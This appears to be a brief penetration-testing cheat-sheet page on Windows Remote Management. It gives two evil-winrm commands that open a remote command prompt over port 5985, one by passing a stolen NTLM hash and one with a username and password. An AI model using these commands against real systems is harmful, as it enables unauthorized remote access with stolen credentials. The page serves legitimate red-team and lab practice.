Windows Remote Management

Passing The Hash

This will give us command prompt if port 5985 is open and user is allowed WinRM using Passing The Hash technique

evil-winrm -i 127.0.0.1 -u username -H NTML_HASH

This will give us command prompt if port 5985 is open and user is allowed WinRM using normal username and password

evil-winrm -i 127.0.0.1 -u username -p password

Last updated 1 year ago